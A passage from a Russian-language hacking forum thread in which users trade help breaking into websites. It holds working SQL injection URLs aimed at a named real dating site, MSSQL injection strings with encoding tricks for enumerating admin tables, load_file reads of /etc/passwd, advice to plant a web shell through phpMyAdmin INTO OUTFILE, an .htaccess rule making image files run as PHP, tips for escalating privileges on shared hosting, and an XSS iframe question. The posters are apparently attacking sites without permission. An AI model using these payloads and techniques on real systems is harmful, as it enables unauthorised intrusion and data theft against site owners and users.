Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ReckouNT

    ReckouNT New Member

    Joined:
    16 Jan 2009
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Нужно поломать сайт с аунтификацией такого вида а-ля alert (JS). На вид подумал что сама аунтификация довольно старая, и возможно есть уязвимости.

    Пикча формы, на фоне - страница, открывающаяся после неуспешного входа (адреса счел нужным скрыть)
    http://s58.radikal.ru/i160/1005/34/9cb26e6c3bc2.png

    Такая штука отображается при доступе к фаилу http://site/admin.php. На пхп фаил не похоже, судя по форме неудачи, прописано где то в апаче.

    brutus-aet2 ом прогонять пробовал, выдает бред при разных настройках. По словарю он выдает каждый раз новые пароли, по подбору - тоже.

    Спасибо.

    ЗЫ: Поиск юзал. Просьба постить только по теме.
    ЗЗЫ: Если запостил тему не в том разделе, просьба переместить и отправить ссылку в ЛС.
    ЗЗЗЫ: Ломаю не ради интереса и не ради того, чтобы "нагадить".
     
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    Пишу в .htaccess
    , и все равно выполняеться код пхп! Как решить?
     
    _________________________
  3. Hero1n

    Hero1n Member

    Joined:
    11 Nov 2008
    Messages:
    12
    Likes Received:
    6
    Reputations:
    1

    мдаааа, ты уже топик вроде создавал, и тебе там совершенно ясно ответили, зачем здесь пишешь?!
    http://en.wikipedia.org/wiki/Basic_access_authentication
    alert() тут не причём, это не javascript.
     
  4. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,509
    Likes Received:
    389
    Reputations:
    101
    А в комбинации с RemoveType?
     
    1 person likes this.
  5. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Попробуй так:
    Code:
    RemoveType .html .gif  
    AddType application/x-httpd-php .html .gif
    
     
    #12705 mr.celt, 6 May 2010
    Last edited: 6 May 2010
  6. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    я тебя люблю) бес комбинации работает, то что надо! ;)
     
    _________________________
  7. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    pclzip.lib.php
     
  8. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    68
    Likes Received:
    90
    Reputations:
    52
    Вставлю свои 5 копеек...

    http://www.freeukdatingsite.com/[email protected]@version
    http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+union+select+null,@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null

    Напридумывали каких-то фильтров)

    зы. Может я слишком плоско мыслью, но я не понимаю, зачем писать попробуй то..сё, если человек отписал с урл...
     
    #12708 v1d0qz, 6 May 2010
    Last edited: 6 May 2010
    2 people like this.
  9. burn90

    burn90 New Member

    Joined:
    5 May 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Имею доступ к phpmyadmin. На сервер установлен форум phpbb, можно ли как то управлять коталогом / из под рут
     
  10. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29
    Попробуй залить шелл через пхп май админ если есть разрешение на into outfile
     
  11. Zilt0

    Zilt0 New Member

    Joined:
    1 Apr 2009
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Всем привет!
    Интересует вопрос, какие способы есть в шаред хостингах для просмотра каталога(или файла), других пользователей
    например:
    /home/andrei/public_html/
    /home/irina/public_html/
    бывает часто что я не имею права на просмотр каталога и все то что внутри,
     
  12. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Я так понял, что ты тоже зареган на подобном серваке и можешь работать токо в своей директории. Наверно и консолька есть...
    Просмотр директорий других юзеров ты можешь добиться:
    1) повышением прав на этом серваке, если найдешь соответствующий эксплоит под данную систему;
    2) т.к. это web-хостинг, то можно попытаться взломать сайты хостящиеся здесь же;
    3) если есть подключения к бд, то проверить возможность чтения файлов через load_file.

    пока больше на ум ничего не приходит
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    ребят делаю запрос

    (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='tbl_group_admin')--

    результат

    Ligne 1 : syntaxe incorrecte vers ')'.

    делаю

    (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(116,98,108,95,103,114,111,117,112,95,97,100,109,105,110))--

    результат

    a fonction char requiert 1 arguments.

    (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f67726f75705f61646d696e)--

    syntaxe incorrecte vers ')'

    что посоветуете?
     
    _________________________
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    427
    Likes Received:
    46
    Reputations:
    40
    Есть сайт, делаю запрос:
    http://test/news.php?id=-1+union+select+1,user(),3,4--
    Выводит:
    [email protected]

    Хочу узнать права на чтение/запись файлов, делаю запрос:
    http://test/news.php?id=-1+union+select+1,file_priv,3,4+from+mysql.user+where+user='adeoo3'--
    Выводит:
    SELECT command denied to user 'adeoo3'@'10.1.1.17' for table 'user'
    Что это значит???
     
  15. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29

    а если без топ 1 попробовать что выводит?
     
  16. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29
    Нетдоступа к таблице майск.юсер, попробуй перечитапть файл через load_file или залить в /tmp и перечитать оттуда.
     
  17. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    427
    Likes Received:
    46
    Reputations:
    40
    надо так:
    (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bchar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar(111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97)%2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--
     
  18. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    206
    Likes Received:
    92
    Reputations:
    11
    Есть активная xss. Как через яваскрипт сделать размер ифрейма на весь экран?
    p.s. С помощью этого <iframe src=//сайт>
     
  19. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    427
    Likes Received:
    46
    Reputations:
    40
    http://test/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4--
    не катит.

    Значит у меня однозначно нет прав?
     
    #12719 pinch, 6 May 2010
    Last edited: 6 May 2010
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    тот же результат

    а можно без url encode?
     
    _________________________
    #12720 Konqi, 6 May 2010
    Last edited: 6 May 2010
Loading...
Thread Status:
Not open for further replies.